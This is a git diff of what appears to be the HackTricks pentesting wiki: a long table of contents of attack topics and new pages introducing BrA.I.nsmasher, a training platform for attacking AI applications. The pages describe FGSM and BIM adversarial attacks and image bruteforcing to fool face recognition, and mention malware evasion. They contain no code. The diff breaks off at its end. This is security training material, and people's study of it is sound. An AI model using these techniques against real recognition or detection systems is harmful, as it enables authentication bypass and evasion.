Exploit](pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-php-5.2-fopen-exploit.md) + * [disable\_functions bypass - via mem](pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-via-mem.md) + * [disable\_functions bypass - mod\_cgi](pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-mod_cgi.md) + * [disable\_functions bypass - PHP 4 >= 4.2.0, PHP 5 pcntl\_exec](pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-php-4-greater-than-4.2.0-php-5-pcntl_exec.md) + * [Python](pentesting/pentesting-web/python.md) + * [Spring Actuators](pentesting/pentesting-web/spring-actuators.md) + * [Symphony](pentesting/pentesting-web/symphony.md) + * [Tomcat](pentesting/pentesting-web/tomcat.md) + * [Uncovering CloudFlare](pentesting/pentesting-web/uncovering-cloudflare.md) + * [VMWare \(ESX, VCenter...\)](pentesting/pentesting-web/vmware-esx-vcenter....md) + * [Web API Pentesting](pentesting/pentesting-web/web-api-pentesting.md) + * [WebDav](pentesting/pentesting-web/put-method-webdav.md) + * [werkzeug](pentesting/pentesting-web/werkzeug.md) + * [Wordpress](pentesting/pentesting-web/wordpress.md) + * [XSS to RCE Electron Desktop Apps](pentesting/pentesting-web/xss-to-rce-electron-desktop-apps.md) +* [88tcp/udp - Pentesting Kerberos](pentesting/pentesting-kerberos-88/README.md) + * [Harvesting tickets from Windows](pentesting/pentesting-kerberos-88/harvesting-tickets-from-windows.md) + * [Harvesting tickets from Linux](pentesting/pentesting-kerberos-88/harvesting-tickets-from-linux.md) +* [110,995 - Pentesting POP](pentesting/pentesting-pop.md) +* [111/TCP/UDP - Pentesting Portmapper](pentesting/pentesting-rpcbind.md) +* [113 - Pentesting Ident](pentesting/113-pentesting-ident.md) +* [123/udp - Pentesting NTP](pentesting/pentesting-ntp.md) +* [135, 593 - Pentesting MSRPC](pentesting/135-pentesting-msrpc.md) +* [137,138,139 - Pentesting NetBios](pentesting/137-138-139-pentesting-netbios.md) +* [139,445 - Pentesting SMB](pentesting/pentesting-smb.md) +* [143,993 - Pentesting IMAP](pentesting/pentesting-imap.md) +* [161,162,10161,10162/udp - Pentesting SNMP](pentesting/pentesting-snmp/README.md) + * [SNMP RCE](pentesting/pentesting-snmp/snmp-rce.md) +* [194,6667,6660-7000 - Pentesting IRC](pentesting/pentesting-irc.md) +* [264 - Pentesting Check Point FireWall-1](pentesting/pentesting-264-check-point-firewall-1.md) +* [389, 636, 3268, 3269 - Pentesting LDAP](pentesting/pentesting-ldap.md) +* [500/udp - Pentesting IPsec/IKE VPN](pentesting/ipsec-ike-vpn-pentesting.md) +* [502 - Pentesting Modbus](pentesting/pentesting-modbus.md) +* [512 - Pentesting Rexec](pentesting/512-pentesting-rexec.md) +* [513 - Pentesting Rlogin](pentesting/pentesting-rlogin.md) +* [514 - Pentesting Rsh](pentesting/pentesting-rsh.md) +* [515 - Pentesting Line Printer Daemon \(LPD\)](pentesting/515-pentesting-line-printer-daemon-lpd.md) +* [548 - Pentesting Apple Filing Protocol \(AFP\)](pentesting/584-pentesting-afp.md) +* [554,8554 - Pentesting RTSP](pentesting/554-8554-pentesting-rtsp.md) +* [623/UDP/TCP - IPMI](pentesting/623-udp-ipmi.md) +* [631 - Internet Printing Protocol\(IPP\)](pentesting/pentesting-631-internet-printing-protocol-ipp.md) +* [873 - Pentesting Rsync](pentesting/873-pentesting-rsync.md) +* [1026 - Pentesting Rusersd](pentesting/1026-pentesting-rusersd.md) +* [1080 - Pentesting Socks](pentesting/1080-pentesting-socks.md) +* [1098/1099/1050 - Pentesting Java RMI - RMI-IIOP](pentesting/1099-pentesting-java-rmi.md) +* [1433 - Pentesting MSSQL - Microsoft SQL Server](pentesting/pentesting-mssql-microsoft-sql-server.md) +* [1521,1522-1529 - Pentesting Oracle TNS Listener](pentesting/1521-1522-1529-pentesting-oracle-listener/README.md) + * [Oracle Pentesting requirements installation](pentesting/1521-1522-1529-pentesting-oracle-listener/oracle-pentesting-requirements-installation.md) + * [TNS Poison](pentesting/1521-1522-1529-pentesting-oracle-listener/tns-poison.md) + * [Remote stealth pass brute force](pentesting/1521-1522-1529-pentesting-oracle-listener/remote-stealth-pass-brute-force.md) + * [Oracle RCE & more](pentesting/1521-1522-1529-pentesting-oracle-listener/oracle-rce-and-more.md) +* [1723 - Pentesting PPTP](pentesting/1723-pentesting-pptp.md) +* [1883 - Pentesting MQTT \(Mosquitto\)](pentesting/1883-pentesting-mqtt-mosquitto.md) +* [2049 - Pentesting NFS Service](pentesting/nfs-service-pentesting.md) +* [2301,2381 - Pentesting Compaq/HP Insight Manager](pentesting/pentesting-compaq-hp-insight-manager.md) +* [2375, 2376 Pentesting Docker](pentesting/2375-pentesting-docker.md) +* [3128 - Pentesting Squid](pentesting/3128-pentesting-squid.md) +* [3260 - Pentesting ISCSI](pentesting/3260-pentesting-iscsi.md) +* [3299 - Pentesting SAPRouter](pentesting/3299-pentesting-saprouter.md) +* [3306 - Pentesting Mysql](pentesting/pentesting-mysql.md) +* [3389 - Pentesting RDP](pentesting/pentesting-rdp.md) +* [3632 - Pentesting distcc](pentesting/3632-pentesting-distcc.md) +* [3690 - Pentesting Subversion \(svn server\)](pentesting/3690-pentesting-subversion-svn-server.md) +* [4369 - Pentesting Erlang Port Mapper Daemon \(epmd\)](pentesting/4369-pentesting-erlang-port-mapper-daemon-epmd.md) +* [5000 - Pentesting Docker Registry](pentesting/5000-pentesting-docker-registry.md) +* [5353/UDP Multicast DNS \(mDNS\)](pentesting/5353-udp-multicast-dns-mdns.md) +* [5432,5433 - Pentesting Postgresql](pentesting/pentesting-postgresql.md) +* [5601 - Pentesting Kibana](pentesting/5601-pentesting-kibana.md) +* [5671,5672 - Pentesting AMQP](pentesting/5671-5672-pentesting-amqp.md) +* [5800,5801,5900,5901 - Pentesting VNC](pentesting/pentesting-vnc.md) +* [5984,6984 - Pentesting CouchDB](pentesting/5984-pentesting-couchdb.md) +* [5985,5986 - Pentesting WinRM](pentesting/5985-5986-pentesting-winrm.md) +* [6000 - Pentesting X11](pentesting/6000-pentesting-x11.md) +* [6379 - Pentesting Redis](pentesting/6379-pentesting-redis.md) +* [8009 - Pentesting Apache JServ Protocol \(AJP\)](pentesting/8009-pentesting-apache-jserv-protocol-ajp.md) +* [8089 - Splunkd](pentesting/8089-splunkd.md) +* [9000 - Pentesting FastCGI](pentesting/9000-pentesting-fastcgi.md) +* [9001 - Pentesting HSQLDB](pentesting/9001-pentesting-hsqldb.md) +* [9042/9160 - Pentesting Cassandra](pentesting/cassandra.md) +* [9100 - Pentesting Raw Printing \(JetDirect, AppSocket, PDL-datastream\)](pentesting/9100-pjl.md) +* [9200 - Pentesting Elasticsearch](pentesting/9200-pentesting-elasticsearch.md) +* [10000 - Pentesting Network Data Management Protocol \(ndmp\)](pentesting/10000-network-data-management-protocol-ndmp.md) +* [11211 - Pentesting Memcache](pentesting/11211-memcache.md) +* [15672 - Pentesting RabbitMQ Management](pentesting/15672-pentesting-rabbitmq-management.md) +* [27017,27018 - Pentesting MongoDB](pentesting/27017-27018-mongodb.md) +* [44818/UDP/TCP - Pentesting EthernetIP](pentesting/44818-ethernetip.md) +* [47808/udp - Pentesting BACNet](pentesting/47808-udp-bacnet.md) +* [50030,50060,50070,50075,50090 - Pentesting Hadoop](pentesting/50030-50060-50070-50075-50090-pentesting-hadoop.md) + +## Pentesting Web + +* [Web Vulnerabilities Methodology](pentesting-web/web-vulnerabilities-methodology.md) +* [Reflecting Techniques - PoCs and Polygloths CheatSheet](pentesting-web/pocs-and-polygloths-cheatsheet/README.md) + * [Web Vulns List](pentesting-web/pocs-and-polygloths-cheatsheet/web-vulns-list.md) +* [2FA/OTP Bypass](pentesting-web/2fa-bypass.md) +* [Abusing hop-by-hop headers](pentesting-web/abusing-hop-by-hop-headers.md) +* [Bypass Payment Process](pentesting-web/bypass-payment-process.md) +* [Captcha Bypass](pentesting-web/captcha-bypass.md) +* [Cache Poisoning and Cache Deception](pentesting-web/cache-deception.md) +* [Clickjacking](pentesting-web/clickjacking.md) +* [Client Side Template Injection \(CSTI\)](pentesting-web/client-side-template-injection-csti.md) +* [Command Injection](pentesting-web/command-injection.md) +* [Content Security Policy \(CSP\) Bypass](pentesting-web/content-security-policy-csp-bypass.md) +* [Cookies Hacking](pentesting-web/hacking-with-cookies.md) +* [CORS - Misconfigurations & Bypass](pentesting-web/cors-bypass.md) +* [CRLF \(%0D%0A\) Injection](pentesting-web/crlf-0d-0a.md) +* [Cross-site WebSocket hijacking \(CSWSH\)](pentesting-web/cross-site-websocket-hijacking-cswsh.md) +* [CSRF \(Cross Site Request Forgery\)](pentesting-web/csrf-cross-site-request-forgery.md) +* [Dangling Markup - HTML scriptless injection](pentesting-web/dangling-markup-html-scriptless-injection.md) +* [Deserialization](pentesting-web/deserialization/README.md) + * [NodeJS - \_\_proto\_\_ & prototype Pollution](pentesting-web/deserialization/nodejs-proto-prototype-pollution.md) + * [Java JSF ViewState \(.faces\) Deserialization](pentesting-web/deserialization/java-jsf-viewstate-.faces-deserialization.md) + * [Java DNS Deserialization, GadgetProbe and Java Deserialization Scanner](pentesting-web/deserialization/java-dns-deserialization-and-gadgetprobe.md) + * [Basic Java Deserialization \(ObjectInputStream, readObject\)](pentesting-web/deserialization/basic-java-deserialization-objectinputstream-readobject.md) + * [CommonsCollection1 Payload - Java Transformers to Rutime exec\(\) and Thread Sleep](pentesting-web/deserialization/java-transformers-to-rutime-exec-payload.md) + * [Basic .Net deserialization \(ObjectDataProvider gadget, ExpandedWrapper, and Json.Net\)](pentesting-web/deserialization/basic-.net-deserialization-objectdataprovider-gadgets-expandedwrapper-and-json.net.md) + * [Exploiting \_\_VIEWSTATE knowing the secrets](pentesting-web/deserialization/exploiting-__viewstate-knowing-the-secret.md) + * [Exploiting \_\_VIEWSTATE without knowing the secrets](pentesting-web/deserialization/exploiting-__viewstate-parameter.md) +* [Domain/Subdomain takeover](pentesting-web/domain-subdomain-takeover.md) +* [Email Header Injection](pentesting-web/email-header-injection.md) +* [File Inclusion/Path traversal](pentesting-web/file-inclusion/README.md) + * [phar:// deserialization](pentesting-web/file-inclusion/phar-deserialization.md) +* [File Upload](pentesting-web/file-upload/README.md) + * [PDF Upload - XXE and CORS bypass](pentesting-web/file-upload/pdf-upload-xxe-and-cors-bypass.md) +* [Formula Injection](pentesting-web/formula-injection.md) +* [HTTP Request Smuggling / HTTP Desync Attack](pentesting-web/http-request-smuggling.md) +* [H2C Smuggling](pentesting-web/h2c-smuggling.md) +* [IDOR](pentesting-web/idor.md) +* [JWT Vulnerabilities \(Json Web Tokens\)](pentesting-web/hacking-jwt-json-web-tokens.md) +* [NoSQL injection](pentesting-web/nosql-injection.md) +* [LDAP Injection](pentesting-web/ldap-injection.md) +* [Login Bypass](pentesting-web/login-bypass/README.md) + * [Login bypass List](pentesting-web/login-bypass/sql-login-bypass.md) +* [OAuth to Account takeover](pentesting-web/oauth-to-account-takeover.md) +* [Open Redirect](pentesting-web/open-redirect.md) +* [Parameter Pollution](pentesting-web/parameter-pollution.md) +* [PostMessage Vulnerabilities](pentesting-web/postmessage-vulnerabilities.md) +* [Race Condition](pentesting-web/race-condition.md) +* [Rate Limit Bypass](pentesting-web/rate-limit-bypass.md) +* [Registration Vulnerabilities](pentesting-web/registration-vulnerabilities.md) +* [Regular expression Denial of Service - ReDoS](pentesting-web/regular-expression-denial-of-service-redos.md) +* [Reset/Forgotten Password Bypass](pentesting-web/reset-password.md) +* [SAML Attacks](pentesting-web/saml-attacks/README.md) + * [SAML Basics](pentesting-web/saml-attacks/saml-basics.md) +* [Server Side Inclusion/Edge Side Inclusion Injection](pentesting-web/server-side-inclusion-edge-side-inclusion-injection.md) +* [SQL Injection](pentesting-web/sql-injection/README.md) + * [MSSQL Injection](pentesting-web/sql-injection/mssql-injection.md) + * [Oracle injection](pentesting-web/sql-injection/oracle-injection.md) + * [PostgreSQL injection](pentesting-web/sql-injection/postgresql-injection/README.md) + * [dblink/lo\_import data exfiltration](pentesting-web/sql-injection/postgresql-injection/dblink-lo_import-data-exfiltration.md) + * [PL/pgSQL Password Bruteforce](pentesting-web/sql-injection/postgresql-injection/pl-pgsql-password-bruteforce.md) + * [Network - Privesc, Port Scanner and NTLM chanllenge response disclosure](pentesting-web/sql-injection/postgresql-injection/network-privesc-port-scanner-and-ntlm-chanllenge-response-disclosure.md) + * [Big Binary Files Upload \(PostgreSQL\)](pentesting-web/sql-injection/postgresql-injection/big-binary-files-upload-postgresql.md) + * [RCE with PostgreSQL Extensions](pentesting-web/sql-injection/postgresql-injection/rce-with-postgresql-extensions.md) + * [MySQL injection](pentesting-web/sql-injection/mysql-injection/README.md) + * [Mysql SSRF](pentesting-web/sql-injection/mysql-injection/mysql-ssrf.md) + * [SQLMap - Cheetsheat](pentesting-web/sql-injection/sqlmap/README.md) + * [Second Order Injection - SQLMap](pentesting-web/sql-injection/sqlmap/second-order-injection-sqlmap.md) +* [SSRF \(Server Side Request Forgery\)](pentesting-web/ssrf-server-side-request-forgery.md) +* [SSTI \(Server Side Template Injection\)](pentesting-web/ssti-server-side-template-injection/README.md) + * [EL - Expression Language](pentesting-web/ssti-server-side-template-injection/el-expression-language.md) +* [Reverse Tab Nabbing](pentesting-web/reverse-tab-nabbing.md) +* [Unicode Normalization vulnerability](pentesting-web/unicode-normalization-vulnerability.md) +* [Web Tool - WFuzz](pentesting-web/web-tool-wfuzz.md) +* [XPATH injection](pentesting-web/xpath-injection.md) +* [XSLT Server Side Injection \(Extensible Stylesheet Languaje Transformations\)](pentesting-web/xslt-server-side-injection-extensible-stylesheet-languaje-transformations.md) +* [XXE - XEE - XML External Entity](pentesting-web/xxe-xee-xml-external-entity.md) +* [XSS \(Cross Site Scripting\)](pentesting-web/xss-cross-site-scripting/README.md) + * [PDF Injection](pentesting-web/xss-cross-site-scripting/pdf-injection.md) + * [DOM XSS](pentesting-web/xss-cross-site-scripting/dom-xss.md) + * [Server Side XSS \(Dynamic PDF\)](pentesting-web/xss-cross-site-scripting/server-side-xss-dynamic-pdf.md) + * [XSS Tools](pentesting-web/xss-cross-site-scripting/xss-tools.md) +* [XSSI \(Cross-Site Script Inclusion\)](pentesting-web/xssi-cross-site-script-inclusion.md) +* [XS-Search](pentesting-web/xs-search.md) + +## Forensics + +* [Basic Forensic Methodology](forensics/basic-forensic-methodology/README.md) + * [Baseline Monitoring](forensics/basic-forensic-methodology/file-integrity-monitoring.md) + * [Anti-Forensic Techniques](forensics/basic-forensic-methodology/anti-forensic-techniques.md) + * [Docker Forensics](forensics/basic-forensic-methodology/docker-forensics.md) + * [Image Adquisition & Mount](forensics/basic-forensic-methodology/image-adquisition-and-mount.md) + * [Linux Forensics](forensics/basic-forensic-methodology/linux-forensics.md) + * [Malware Analysis](forensics/basic-forensic-methodology/malware-analysis.md) + * [Memory dump analysis](forensics/basic-forensic-methodology/memory-dump-analysis/README.md) + * [Volatility - CheatSheet](forensics/basic-forensic-methodology/memory-dump-analysis/volatility-examples.md) + * [Partitions/File Systems/Carving](forensics/basic-forensic-methodology/partitions-file-systems-carving/README.md) + * [EXT](forensics/basic-forensic-methodology/partitions-file-systems-carving/ext.md) + * [File/Data Carving & Recovery Tools](forensics/basic-forensic-methodology/partitions-file-systems-carving/file-data-carving-recovery-tools.md) + * [NTFS](forensics/basic-forensic-methodology/partitions-file-systems-carving/ntfs.md) + * [Pcap Inspection](forensics/basic-forensic-methodology/pcap-inspection/README.md) + * [DNSCat pcap analysis](forensics/basic-forensic-methodology/pcap-inspection/dnscat-exfiltration.md) + * [USB Keystrokes](forensics/basic-forensic-methodology/pcap-inspection/usb-keystrokes.md) + * [Wifi Pcap Analysis](forensics/basic-forensic-methodology/pcap-inspection/wifi-pcap-analysis.md) + * [Wireshark tricks](forensics/basic-forensic-methodology/pcap-inspection/wireshark-tricks.md) + * [Specific Software/File-Type Tricks](forensics/basic-forensic-methodology/specific-software-file-type-tricks/README.md) + * [.pyc](forensics/basic-forensic-methodology/specific-software-file-type-tricks/.pyc.md) + * [Browser Artifacts](forensics/basic-forensic-methodology/specific-software-file-type-tricks/browser-artifacts.md) + * [Desofuscation vbs \(cscript.exe\)](forensics/basic-forensic-methodology/specific-software-file-type-tricks/desofuscation-vbs-cscript.exe.md) + * [Local Cloud Storage](forensics/basic-forensic-methodology/specific-software-file-type-tricks/local-cloud-storage.md) + * [Office file analysis](forensics/basic-forensic-methodology/specific-software-file-type-tricks/office-file-analysis.md) + * [PDF File analysis](forensics/basic-forensic-methodology/specific-software-file-type-tricks/pdf-file-analysis.md) + * [PNG tricks](forensics/basic-forensic-methodology/specific-software-file-type-tricks/png-tricks.md) + * [Video and Audio file analysis](forensics/basic-forensic-methodology/specific-software-file-type-tricks/video-and-audio-file-analysis.md) + * [ZIPs tricks](forensics/basic-forensic-methodology/specific-software-file-type-tricks/zips-tricks.md) + * [Windows Artifacts](forensics/basic-forensic-methodology/windows-forensics/README.md) + * [Windows Processes](forensics/basic-forensic-methodology/windows-forensics/windows-processes.md) + * [Interesting Windows Registry Keys](forensics/basic-forensic-methodology/windows-forensics/interesting-windows-registry-keys.md) + +## A.I. Exploiting + +* [BRA.I.NSMASHER Presentation](a.i.-exploiting/bra.i.nsmasher-presentation/README.md) + * [Basic Bruteforcer](a.i.-exploiting/bra.i.nsmasher-presentation/basic-bruteforcer.md) + * [Basic Captcha Breaker](a.i.-exploiting/bra.i.nsmasher-presentation/basic-captcha-breaker.md) + * [BIM Bruteforcer](a.i.-exploiting/bra.i.nsmasher-presentation/bim-bruteforcer.md) + * [Hybrid Malware Classifier Part 1](a.i.-exploiting/bra.i.nsmasher-presentation/hybrid-malware-classifier-part-1.md) + +## Blockchain + +* [Blockchain & Crypto Currencies](blockchain/blockchain-and-crypto-currencies.md) + +## Courses and Certifications Reviews + +* [INE Courses and eLearnSecurity Certifications Reviews](courses-and-certifications-reviews/ine-courses-and-elearnsecurity-certifications-reviews.md) + +## Cloud Security + +* [Cloud security review](cloud-security/cloud-security-review.md) +* [AWS Security](cloud-security/aws-security.md) + +## Physical attacks + +* [Physical Attacks](physical-attacks/physical-attacks.md) +* [Escaping from KIOSKs](physical-attacks/escaping-from-gui-applications/README.md) + * [Show file extensions](physical-attacks/escaping-from-gui-applications/show-file-extensions.md) + +## Reversing + +* [Reversing Tools & Basic Methods](reversing/reversing-tools-basic-methods/README.md) + * [Angr](reversing/reversing-tools-basic-methods/angr.md) + * [Z3 - Satisfiability Modulo Theories \(SMT\)](reversing/reversing-tools-basic-methods/satisfiability-modulo-theories-smt-z3.md) + * [Cheat Engine](reversing/reversing-tools-basic-methods/cheat-engine.md) + * [Blobrunner](reversing/reversing-tools-basic-methods/blobrunner.md) +* [Common API used in Malware](reversing/common-api-used-in-malware.md) +* [Cryptographic/Compression Algorithms](reversing/cryptographic-algorithms/README.md) + * [Unpacking binaries](reversing/cryptographic-algorithms/unpacking-binaries.md) +* [Word Macros](reversing/word-macros.md) + +## Exploiting + +* [Linux Exploiting \(Basic\) \(SPA\)](exploiting/linux-exploiting-basic-esp/README.md) + * [Format String Template](exploiting/linux-exploiting-basic-esp/format-string-template.md) + * [ROP - Syscall execv](exploiting/linux-exploiting-basic-esp/rop-syscall-execv.md) + * [ROP - Leaking LIBC address](exploiting/linux-exploiting-basic-esp/rop-leaking-libc-address.md) + * [ROP-PWN template](exploiting/linux-exploiting-basic-esp/rop-pwn-template.md) + * [Bypassing Canary & PIE](exploiting/linux-exploiting-basic-esp/bypassing-canary-and-pie.md) + * [Ret2Lib](exploiting/linux-exploiting-basic-esp/ret2lib.md) + * [Fusion](exploiting/linux-exploiting-basic-esp/fusion.md) +* [Exploiting Tools](exploiting/tools/README.md) + * [PwnTools](exploiting/tools/pwntools.md) +* [Windows Exploiting \(Basic Guide - OSCP lvl\)](exploiting/windows-exploiting-basic-guide-oscp-lvl.md) + +## Cryptography + +* [Certificates](cryptography/certificates.md) +* [Cipher Block Chaining CBC-MAC](cryptography/cipher-block-chaining-cbc-mac-priv.md) +* [Crypto CTFs Tricks](cryptography/crypto-ctfs-tricks.md) +* [Electronic Code Book \(ECB\)](cryptography/electronic-code-book-ecb.md) +* [Hash Length Extension Attack](cryptography/hash-length-extension-attack.md) +* [Padding Oracle](cryptography/padding-oracle-priv.md) +* [RC4 - Encrypt&Decrypt](cryptography/rc4-encrypt-and-decrypt.md) + +## BACKDOORS + +* [Merlin](backdoors/merlin.md) +* [Empire](backdoors/empire.md) +* [Salseo](backdoors/salseo.md) +* [ICMPsh](backdoors/icmpsh.md) + +## Stego + +* [Stego Tricks](stego/stego-tricks.md) +* [Esoteric languages](stego/esoteric-languages.md) + +## MISC + +* [Basic Python](misc/basic-python/README.md) + * [venv](misc/basic-python/venv.md) + * [Bypass Python sandboxes](misc/basic-python/bypass-python-sandboxes.md) + * [Magic Methods](misc/basic-python/magic-methods.md) + * [Web Requests](misc/basic-python/web-requests.md) + * [Bruteforce hash \(few chars\)](misc/basic-python/bruteforce-hash-few-chars.md) +* [Other Big References](misc/references.md) + +## TODO + +* [More Tools](todo/more-tools.md) +* [MISC](todo/misc.md) +* [Pentesting DNS](todo/pentesting-dns.md) + +--- + +* [Burp Suite](burp-suite.md) +* [Other Web Tricks](other-web-tricks.md) +* [Interesting HTTP](interesting-http.md) +* [Emails Vulnerabilities](emails-vulns.md) +* [Android Forensics](android-forensics.md) +* [TR-069](tr-069.md) +* [6881/udp - Pentesting BitTorrent](6881-udp-pentesting-bittorrent.md) +* [CTF Write-ups](ctf-write-ups/README.md) + * [challenge-0521.intigriti.io](ctf-write-ups/challenge-0521.intigriti.io.md) + * [Try Hack Me](ctf-write-ups/try-hack-me/README.md) + * [hc0n Christmas CTF - 2019](ctf-write-ups/try-hack-me/hc0n-christmas-ctf-2019.md) + * [Pickle Rick](ctf-write-ups/try-hack-me/pickle-rick.md) +* [1911 - Pentesting fox](1911-pentesting-fox.md) +* [Online Platforms with API](online-platforms-with-api.md) +* [Stealing Sensitive Information Disclosure from a Web](stealing-sensitive-information-disclosure-from-a-web.md) +* [Post Exploitation](post-exploitation.md) + diff --git a/a.i.-exploiting/bra.i.nsmasher-presentation/BIM_Bruteforcer.md b/a.i.-exploiting/bra.i.nsmasher-presentation/BIM_Bruteforcer.md new file mode 100644 index 00000000000..136a58d35ef --- /dev/null +++ b/a.i.-exploiting/bra.i.nsmasher-presentation/BIM_Bruteforcer.md @@ -0,0 +1,13 @@ +#BRUTEFORCER CORE SCRIPT WITH BIM ATTACK + +This time we introduce a new type of gradient based attack, in order to brute force an image classification app (can be shaped and used for any input of course), the BIM, or Basic Iteration Method. + +It's reccomended to see at least the explanation in the [**introduction challenge colab Notebook**](//https://colab.research.google.com/drive/1lDh0oZ3TR-z87WjogdegZCdtsUuDADcR) + +To go deeper on the BIM topic: +https://arxiv.org/pdf/1607.02533.pdf + +As usual we will provide only the A.I. attack core part, it's up to you to complete the tool and blending it with PT techniques, depending on the situations. + +Please Note: +Remeber, in those kind of scenarios, in order to mime real-based attack applications, we don't have the exact model to fool or the image target in which we would like to transform our image. That's why, in order to overcome this issue, we must blend our core script, with a bruteforcer logic, accordingly to the application responses we want to fool. \ No newline at end of file diff --git a/a.i.-exploiting/bra.i.nsmasher-presentation/Basic_Bruteforcer.md b/a.i.-exploiting/bra.i.nsmasher-presentation/Basic_Bruteforcer.md new file mode 100644 index 00000000000..837c1cb88fe --- /dev/null +++ b/a.i.-exploiting/bra.i.nsmasher-presentation/Basic_Bruteforcer.md @@ -0,0 +1,13 @@ + +# BRUTEFORCER IMAGE CORRUPTION SCRIPT + +The purpose here is to introduce the user to some basic concepts about **A.I. apps exploiting**, via some easy to follow scripts, which represents the core for writing useful tools.
+In this example (which can be used to solve the easy labs of BrainSmasher) by recalling also what is written in the solution for the introduction challenge, we will provide a simple yet useful way, in order to iteratively produce some corrupted images, to bruteforce the face recon easy labs (and thus also real applications that relies on the same principles) + +Of course we will not provide the full code but only the core part for the exploiting of the model,**instead some exercises will be left to the user (the pentesting part)**, in order to complete the tool. We will provides also some hints, just to give an idea of what can be done. + +The script can be found at [**IMAGE BRUTEFORCER**](https://colab.research.google.com/drive/1kUiWGRKr4vhqjI9Xgaqw3D5z3SeTXKmV) + +Try it on our labs [**BrA.I.Smasher Website**](https://beta.brainsmasher.eu/) +
+Enjoy and stay safe! \ No newline at end of file diff --git a/a.i.-exploiting/bra.i.nsmasher-presentation/Hybrid_Malware_Classifier_Part_1.md b/a.i.-exploiting/bra.i.nsmasher-presentation/Hybrid_Malware_Classifier_Part_1.md new file mode 100644 index 00000000000..672b78230a9 --- /dev/null +++ b/a.i.-exploiting/bra.i.nsmasher-presentation/Hybrid_Malware_Classifier_Part_1.md @@ -0,0 +1,18 @@ +#A.I. HYBRID MALWARE CLASSIFIER +##INTERMEDIATE PYTHON SKILL, INTERMEDIATE MACHINE LEARNING SKILLS (Part 1) + +In this series of notebook we are going to build an **hybrid malware classifier.** + +For the **First part** we will focus on the scripting that involves dynamic analysis. Any steps of this series will come useful in order to detect malwares, and in this piece we will try to classify them based on their behaviour, utilizing the logs produced by running a program. + +In the **Second Part** we will see how to manipulate the logs files in order to add robustness to our classifier and adjust the code to counter the more advanced methods of A.I. Malware Evasion. + +In the **Third Part** we will create a Static Malware Classifier. + +For the **Fourth Part** For the Fourth Part we will add some tactics to add robustness to our Static classifier and merge the latter with our Dynamic Classifier. + +**PLEASE NOTE:** This Series strongly relies on building a dataset on your own, even if it's not mandatory.
+There are also many available datasets for Static and/ or Dynamic Malware analysis on several sites for this type of classification, like Ember, VirusShare, Sorel-20M, but i strongly encourage that you build one or your own. + +Here's the link to our [**colab notebook**](https://colab.research.google.com/drive/1nNZLMogXF-iq-_78IvGTd-c89_C82AB8#scrollTo=lUHLMl8Pusrn) enjoy and stay safe :) + diff --git a/a.i.-exploiting/bra.i.nsmasher-presentation/README.md b/a.i.-exploiting/bra.i.nsmasher-presentation/README.md new file mode 100644 index 00000000000..d47078e06a4 --- /dev/null +++ b/a.i.-exploiting/bra.i.nsmasher-presentation/README.md @@ -0,0 +1,37 @@ +# BRA.I.NSMASHER Presentation + +## Presentation + +**BrainSmasher** is a platform made with the purpose of aiding **pentesters, researcher, students, A.I. Cybersecurity engineers** to practice and learn all the techniques for **exploiting commercial A.I.** applications, by working on specifically crafted labs that reproduce several systems, like face recognition, speech recognition, ensemble image classification, autonomous drive, malware evasion, chatbot, data poisoning etc... + +Every month a lab on various topic found in commercial A.I. applications will be posted, with **3 different difficulties** \(named challenges\), in order to **guide** the user in **understanding** all the mechanics behind it and practice **different** ways of **exploitation**. + +Since A.I. applications are relatively new, there is also the possibility that the **harder difficulty challenges for the labs don't have some public known ways of exploitation**, so it's up to you to find the correct solution. Maybe some challenges could need the **combination** of "**standard**" **cybersecurity** techniques with **machine** **learning** adversarial attacks ;\) + +The platform, which is now in **beta** version, will also feature in the next future **paid** competitions, **job** **offers** posting, **ranking** system, **tutorials** on several A.I. exploit topics, the possibility to **earn** **money** by **proposing** personal **labs** or different challenges, for an already existent A.I. lab applications, to be used by the community and also propose modification already existent challenges in order to augment their robustness vs. the various attacks. + +All the **material and the techs for the exploitation of A.I. will be posted here** in a dedicated section of hacktricks. + +**While** we are in **beta** version and completing the implementation of all the above described features, the subscription and all the already posted labs with their relative **challenges are free**. +**So start learning how to exploit A.I. for free while you can in** [**BrA.I.Smasher Website**](https://beta.brainsmasher.eu/) +****ENJOY ;\) + +_A big thanks to Hacktricks and Carlos Polop for giving us this opportunity_ + +> _Walter Miele from BrA.I.nsmasher_ + +## Registry Challenge + +In order to register in [**BrA.I.Smasher** ](https://beta.brainsmasher.eu/)you need to solve an easy challenge \([**here**](https://beta.brainsmasher.eu/registrationChallenge)\). +Just think how you can confuse a neuronal network while not confusing the other one knowing that one detects better the panda while the other one is worse... + +{% hint style="info" %} +However, if at some point you **don't know how to solve** the challenge, or **even if you solve it**, check out the official solution in [**google colab**](https://colab.research.google.com/drive/1MR8i_ATm3bn3CEqwaEnRwF0eR25yKcjn?usp=sharing). +{% endhint %} + +I have to tell you that there are **easier ways** to pass the challenge, but this **solution** is **awesome** as you will learn how to pass the challenge performing an **Adversarial Image performing a Fast Gradient Signed Method \(FGSM\) attack for images.** + +## More Tutorials + +{% page-ref page="basic-captcha-breaker.md" %} + diff --git a/a.i.-exploiting/bra.i.nsmasher-presentation/basic-bruteforcer.md b/a.i.-exploiting/bra.i.nsmasher-presentation/basic-bruteforcer.md new file mode 100644 index 00000000000..fb92691197c --- /dev/null +++ b/a.i.-exploiting/bra.i.nsmasher-presentation/basic-bruteforcer.md @@ -0,0 +1,15 @@ +# Basic Bruteforcer + +## BRUTEFORCER IMAGE CORRUPTION SCRIPT + +The purpose here is to introduce the user to some basic concepts about **A.I. apps exploiting**, via some easy to follow scripts, which represents the core for writing useful tools.<br> +In this example \(which can be used to solve the easy labs of BrainSmasher\) by recalling also what is written in the solution for the introduction challenge, we will provide a simple yet useful way, in order to iteratively produce some corrupted images, to bruteforce the face recon easy labs \(and thus also real applications that relies on the same principles\) + +Of course we will not provide the full code but only the core part for the exploiting of the model, **instead some exercises will be left to the user \(the pentesting part\)**, in order to complete the tool. We will provides also some hints, just to give an idea of what can be done. + +The script can be found at [**IMAGE BRUTEFORCER**](https://colab.research.google.com/drive/1kUiWGRKr4vhqjI9Xgaqw3D5z3SeTXKmV) + +Try it on our labs [**BrA.I.Smasher Website**](https://beta.brainsmasher.eu/) + +Enjoy and stay safe! + diff --git 